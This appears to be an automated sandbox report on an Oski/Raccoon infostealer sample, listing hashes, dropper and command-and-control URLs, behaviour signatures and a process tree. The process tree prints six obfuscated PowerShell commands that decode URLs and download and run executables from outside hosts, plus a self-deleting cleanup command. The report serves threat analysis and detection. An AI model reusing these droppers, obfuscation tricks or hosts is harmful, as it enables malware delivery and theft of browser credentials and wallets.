oski | 5edb1348236c7fa03dae6c9e2d3c9e4241c2eaa2a8721e5c4b78abc9b66075f8

Analysis

max time kernel
150s
max time network
153s
platform
windows10_x64
resource
win10-en-20211014
submitted
29-10-2021 03:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.exe
Size

45KB
MD5

6695ddd2891c24fc85a47ad37bd57f3f
SHA1

648c4f0115f50e4186e44fade356f635dc995362
SHA256

5edb1348236c7fa03dae6c9e2d3c9e4241c2eaa2a8721e5c4b78abc9b66075f8
SHA512

51bc34f6b07df6bc8eaed91f85516441403c89c2260fcc1e7d359eed777dedf2339cc82ea4645535c7ad141a35f4b642e1bbfadbd4e6270f0ad2cbba30f91084

Score

10^/10

oski raccoon b76017a227a0d879dec7c76613918569d03892fb discovery infostealer spyware stealer suricata upx

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/e5K5i

exe.dropper

http://bit.do/e5K5i

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://kfdhsa.ru/asdfg.exe

exe.dropper

http://kfdhsa.ru/asdfg.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/e5K4b

exe.dropper

http://bit.do/e5K4b

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://nicoslag.ru/asdfg.exe

exe.dropper

http://nicoslag.ru/asdfg.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/e5K4M

exe.dropper

http://bit.do/e5K4M

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bratiop.ru/asdfg.exe

exe.dropper

http://bratiop.ru/asdfg.exe

Extracted

Family

oski

scarsa.ac.ug

Extracted

Family

raccoon

Botnet

b76017a227a0d879dec7c76613918569d03892fb

Attributes

url4cnc
http://telegka.top/brikitiki
http://telegin.top/brikitiki
https://t.me/brikitiki

rc4.plain

Signatures

Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

20 1708 powershell.exe
21 1112 powershell.exe
22 308 powershell.exe
25 308 powershell.exe
26 1708 powershell.exe
Downloads MZ/PE file

flow	pid	process
20	1708	powershell.exe
21	1112	powershell.exe
22	308	powershell.exe
25	308	powershell.exe
26	1708	powershell.exe

Executes dropped EXE 10 IoCs

Processes:

gen.exeaok.exejum.exeVtergfds.exeVtergfds.exeVereransa.exeVereransa.exeVereransa.exeaok.exeVereransa.exe

pid	process
2696	gen.exe
3608	aok.exe
1040	jum.exe
3896	Vtergfds.exe
1364	Vtergfds.exe
1880	Vereransa.exe
2480	Vereransa.exe
2972	Vereransa.exe
3596	aok.exe
3396	Vereransa.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\gen.exe	upx
C:\Users\Admin\AppData\Local\Temp\gen.exe	upx

Loads dropped DLL 3 IoCs

Processes:

Vereransa.exe

pid process

2972 Vereransa.exe
2972 Vereransa.exe
2972 Vereransa.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

pid	process
2972	Vereransa.exe
2972	Vereransa.exe
2972	Vereransa.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

Vereransa.exeaok.exeVereransa.exe

description	pid	process	target process
PID 1880 set thread context of 2972	1880	Vereransa.exe	Vereransa.exe
PID 3608 set thread context of 3596	3608	aok.exe	aok.exe
PID 2480 set thread context of 3396	2480	Vereransa.exe	Vereransa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Vereransa.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Vereransa.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1176 taskkill.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings cmd.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Vereransa.exe

pid	process
1176	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1708	powershell.exe
308	powershell.exe
3416	powershell.exe
3920	powershell.exe
1112	powershell.exe
660	powershell.exe
3920	powershell.exe
660	powershell.exe
308	powershell.exe
1112	powershell.exe
1708	powershell.exe
3416	powershell.exe
1112	powershell.exe
3416	powershell.exe
308	powershell.exe
3920	powershell.exe
660	powershell.exe
1708	powershell.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

Vereransa.exeaok.exeVereransa.exe

pid process

1880 Vereransa.exe
3608 aok.exe
2480 Vereransa.exe

pid	process
1880	Vereransa.exe
3608	aok.exe
2480	Vereransa.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	660	powershell.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeDebugPrivilege	3920	powershell.exe
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeDebugPrivilege	308	powershell.exe
Token: SeDebugPrivilege	1176	taskkill.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

jum.exeaok.exeVtergfds.exeVtergfds.exeVereransa.exeVereransa.exe

pid process

1040 jum.exe
3608 aok.exe
3896 Vtergfds.exe
1364 Vtergfds.exe
2480 Vereransa.exe
1880 Vereransa.exe

pid	process
1040	jum.exe
3608	aok.exe
3896	Vtergfds.exe
1364	Vtergfds.exe
2480	Vereransa.exe
1880	Vereransa.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.execmd.exegen.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exepowershell.exepowershell.exejum.exeaok.exeVereransa.exe

description	pid	process	target process
PID 2648 wrote to memory of 3012	2648	5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.exe	cmd.exe
PID 2648 wrote to memory of 3012	2648	5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.exe	cmd.exe
PID 2648 wrote to memory of 3012	2648	5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.exe	cmd.exe
PID 3012 wrote to memory of 2696	3012	cmd.exe	gen.exe
PID 3012 wrote to memory of 2696	3012	cmd.exe	gen.exe
PID 3012 wrote to memory of 2696	3012	cmd.exe	gen.exe
PID 2696 wrote to memory of 2808	2696	gen.exe	cmd.exe
PID 2696 wrote to memory of 2808	2696	gen.exe	cmd.exe
PID 2696 wrote to memory of 2808	2696	gen.exe	cmd.exe
PID 2808 wrote to memory of 2804	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 2804	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 2804	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 636	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 636	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 636	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 3148	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 3148	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 3148	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 3952	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 3952	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 3952	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 1124	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 1124	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 1124	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 4084	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 4084	2808	cmd.exe	mshta.exe
PID 2808 wrote to memory of 4084	2808	cmd.exe	mshta.exe
PID 4084 wrote to memory of 3920	4084	mshta.exe	powershell.exe
PID 4084 wrote to memory of 3920	4084	mshta.exe	powershell.exe
PID 4084 wrote to memory of 3920	4084	mshta.exe	powershell.exe
PID 1124 wrote to memory of 308	1124	mshta.exe	powershell.exe
PID 1124 wrote to memory of 308	1124	mshta.exe	powershell.exe
PID 1124 wrote to memory of 308	1124	mshta.exe	powershell.exe
PID 636 wrote to memory of 660	636	mshta.exe	powershell.exe
PID 636 wrote to memory of 660	636	mshta.exe	powershell.exe
PID 636 wrote to memory of 660	636	mshta.exe	powershell.exe
PID 3148 wrote to memory of 1708	3148	mshta.exe	powershell.exe
PID 3148 wrote to memory of 1708	3148	mshta.exe	powershell.exe
PID 3148 wrote to memory of 1708	3148	mshta.exe	powershell.exe
PID 3952 wrote to memory of 3416	3952	mshta.exe	powershell.exe
PID 3952 wrote to memory of 3416	3952	mshta.exe	powershell.exe
PID 3952 wrote to memory of 3416	3952	mshta.exe	powershell.exe
PID 2804 wrote to memory of 1112	2804	mshta.exe	powershell.exe
PID 2804 wrote to memory of 1112	2804	mshta.exe	powershell.exe
PID 2804 wrote to memory of 1112	2804	mshta.exe	powershell.exe
PID 1708 wrote to memory of 3608	1708	powershell.exe	aok.exe
PID 1708 wrote to memory of 3608	1708	powershell.exe	aok.exe
PID 1708 wrote to memory of 3608	1708	powershell.exe	aok.exe
PID 308 wrote to memory of 1040	308	powershell.exe	jum.exe
PID 308 wrote to memory of 1040	308	powershell.exe	jum.exe
PID 308 wrote to memory of 1040	308	powershell.exe	jum.exe
PID 1040 wrote to memory of 1364	1040	jum.exe	Vtergfds.exe
PID 1040 wrote to memory of 1364	1040	jum.exe	Vtergfds.exe
PID 1040 wrote to memory of 1364	1040	jum.exe	Vtergfds.exe
PID 3608 wrote to memory of 3896	3608	aok.exe	Vtergfds.exe
PID 3608 wrote to memory of 3896	3608	aok.exe	Vtergfds.exe
PID 3608 wrote to memory of 3896	3608	aok.exe	Vtergfds.exe
PID 1040 wrote to memory of 2480	1040	jum.exe	Vereransa.exe
PID 1040 wrote to memory of 2480	1040	jum.exe	Vereransa.exe
PID 1040 wrote to memory of 2480	1040	jum.exe	Vereransa.exe
PID 3608 wrote to memory of 1880	3608	aok.exe	Vereransa.exe
PID 3608 wrote to memory of 1880	3608	aok.exe	Vereransa.exe
PID 3608 wrote to memory of 1880	3608	aok.exe	Vereransa.exe
PID 1880 wrote to memory of 2972	1880	Vereransa.exe	Vereransa.exe

C:\Users\Admin\AppData\Local\Temp\5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.exe
"C:\Users\Admin\AppData\Local\Temp\5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B893.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\5EDB1348236C7FA03DAE6C9E2D3C9E4241C2EAA2A8721.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3012

C:\Users\Admin\AppData\Local\Temp\gen.exe
gen.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B9BC.tmp\start2.bat" C:\Users\Admin\AppData\Local\Temp\gen.exe"
4⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2808

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B9BC.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
5⤵
- Suspicious use of WriteProcessMemory
PID:2804

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ufnxmjsqb $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ufnxmjsqb mwsfev $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|mwsfev;ufnxmjsqb zwncmhjoglapft $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0TQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);zwncmhjoglapft $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1112

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B9BC.tmp\b1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
5⤵
- Suspicious use of WriteProcessMemory
PID:636

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xksqtuiezpom $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xksqtuiezpom najxgsmhtuwd $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|najxgsmhtuwd;xksqtuiezpom lubwzta $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2tmZGhzYS5ydS9hc2RmZy5leGU=';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);lubwzta $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:660

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B9BC.tmp\b2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
5⤵
- Suspicious use of WriteProcessMemory
PID:3148

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL luhqmxbnvrt $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;luhqmxbnvrt pkzotxjl $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|pkzotxjl;luhqmxbnvrt aiykpt $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs1aQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);aiykpt $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1708

C:\Users\Public\aok.exe
"C:\Users\Public\aok.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3608

C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe
"C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3896

C:\Users\Admin\AppData\Local\Temp\Vereransa.exe
"C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1880

C:\Users\Admin\AppData\Local\Temp\Vereransa.exe
"C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2972

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 2972 & erase C:\Users\Admin\AppData\Local\Temp\Vereransa.exe & RD /S /Q C:\\ProgramData\\149654300815267\\* & exit
10⤵
PID:1912

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 2972
11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Users\Public\aok.exe
"C:\Users\Public\aok.exe"
8⤵
- Executes dropped EXE
PID:3596

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B9BC.tmp\b2a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
5⤵
- Suspicious use of WriteProcessMemory
PID:3952

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL qjezygpm $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;qjezygpm tykqrhcaxivo $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|tykqrhcaxivo;qjezygpm yqvjfrouc $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JyYXRpb3AucnUvYXNkZmcuZXhl';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);yqvjfrouc $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3416

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B9BC.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
5⤵
- Suspicious use of WriteProcessMemory
PID:1124

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL fwygvqhixbak $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;fwygvqhixbak rwfxnse $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rwfxnse;fwygvqhixbak vdgyxptwz $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL2JpdC5kby9lNUs0Yg==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);vdgyxptwz $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:308

C:\Users\Public\jum.exe
"C:\Users\Public\jum.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1040

C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe
"C:\Users\Admin\AppData\Local\Temp\Vtergfds.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1364

C:\Users\Admin\AppData\Local\Temp\Vereransa.exe
"C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2480

C:\Users\Admin\AppData\Local\Temp\Vereransa.exe
"C:\Users\Admin\AppData\Local\Temp\Vereransa.exe"
9⤵
- Executes dropped EXE
PID:3396

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B9BC.tmp\m1a.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
5⤵
- Suspicious use of WriteProcessMemory
PID:4084

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$bpxdtgurfy = Get-Random -Min 3 -Max 4;$kvprzenol = ([char[]]([char]97..[char]122));$kilrvtjqbpf = -join ($kvprzenol | Get-Random -Count $bpxdtgurfy | % {[Char]$_});$cywaotpg = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$sdxukbqaet = $kilrvtjqbpf + $cywaotpg;$lqxkwnzbet=[char]0x53+[char]0x61+[char]0x4c;$wjzlb=[char]0x49+[char]0x45+[char]0x58;$gwhbrk=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL xrfhvszbucp $lqxkwnzbet;$icsveyzkjnx=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;xrfhvszbucp qtpbfnvsjwme $wjzlb;$xpuejrdgs=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|qtpbfnvsjwme;xrfhvszbucp pedzf $gwhbrk;$grskazxcw = $xpuejrdgs + [char]0x5c + $sdxukbqaet;;;;$znawsyrgkhc = 'aHR0cDovL25pY29zbGFnLnJ1L2FzZGZnLmV4ZQ==';$znawsyrgkhc=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($znawsyrgkhc));$wotzruh = New-Object $icsveyzkjnx;$wvauomrtzqe = $wotzruh.DownloadData($znawsyrgkhc);[IO.File]::WriteAllBytes($grskazxcw, $wvauomrtzqe);pedzf $grskazxcw;;$prkwoxidg = @($gkyzlmsb, $nzcxsqowpr, $kelohawmzyd, $kuxbygm);foreach($bhkiy in $prkwoxidg){$null = $_}""
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3920

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

